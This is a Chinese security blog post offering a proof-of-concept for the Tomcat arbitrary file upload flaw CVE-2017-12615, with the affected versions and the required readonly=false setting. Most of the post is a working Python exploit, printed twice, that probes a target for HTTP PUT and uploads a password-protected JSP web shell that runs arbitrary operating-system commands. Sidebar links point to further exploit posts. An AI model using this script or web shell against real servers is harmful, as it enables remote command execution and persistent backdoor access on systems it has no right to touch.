【CVE-2017-12615】Tomcat任意文件上传漏洞POC

2019年5月19日07:21:33评论583 views字数 1390阅读4分38秒阅读模式

摘要

conf/web.xml文件添加readonly参数，属性值为false #! -*- coding:utf-8 -*- import httplib import sys import time body = '''''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"//n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>''' try: conn = httplib.HTTPConnection(sys.argv[1]) conn.request(method='OPTIONS', url='/ffffzz') headers = dict(conn.getresponse().getheaders()) if 'allow' in headers and / headers['allow'].find('PUT') > 0 : conn.close() conn = httplib.HTTPConnection(sys.argv[1]) url = "/" + str(int(time.time()))+'.jsp/' #url = "/" + str(int(time.time()))+'.jsp::$DATA' conn.request( method='PUT', url= url, body=body) res = conn.getresponse() if res.status == 201 : #print 'shell:', 'http://' + sys.argv[1] + url[:-7] print 'shell:', 'http://' + sys.argv[1] + url[:-1] elif res.status == 204 : print 'file exists' else: print 'error' conn.close() else: print 'Server not vulnerable' except Exception,e: print 'Error:', e

前言：
记Tomcat开启PUT后的任意文件上传

影响版本：

7.0.0 – 7.0.81

需要因素：

conf/web.xml文件添加readonly参数，属性值为false

#! -*- coding:utf-8 -*-    import httplib   import sys   import time   body = '''''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp  +"//n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''   try:       conn = httplib.HTTPConnection(sys.argv[1])       conn.request(method='OPTIONS', url='/ffffzz')       headers = dict(conn.getresponse().getheaders())       if 'allow' in headers and /          headers['allow'].find('PUT') > 0 :           conn.close()           conn = httplib.HTTPConnection(sys.argv[1])           url = "/" + str(int(time.time()))+'.jsp/'           #url = "/" + str(int(time.time()))+'.jsp::$DATA'           conn.request( method='PUT', url= url, body=body)           res = conn.getresponse()           if res.status  == 201 :               #print 'shell:', 'http://' + sys.argv[1] + url[:-7]               print 'shell:', 'http://' + sys.argv[1] + url[:-1]           elif res.status == 204 :               print 'file exists'           else:               print 'error'           conn.close()       else:           print 'Server not vulnerable'              except Exception,e:       print 'Error:', e

左青龙
微信扫一扫

右白虎
微信扫一扫

【CVE-2017-12615】Tomcat任意文件上传漏洞POC

linux sudo root 权限绕过漏洞(CVE-2019-14287)

vBulletin远程代码执行漏洞（CVE-2019-16759）

mintinstall 7.9.9-代码执行(CVE-2019-17080)

Webmin远程代码执行漏洞【CVE-2019-15107】

PDF窃取Windows NTLM哈希值

骚姿势之shell32.dll执行getpass

Windows Server 2019开启远程桌面

Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725)

CVE-2019-1064 AppXSVC本地权限提升漏洞分析及poc

metasploit创建反向shell并访问Windows 10系统环境

发表评论

在线咨询

微信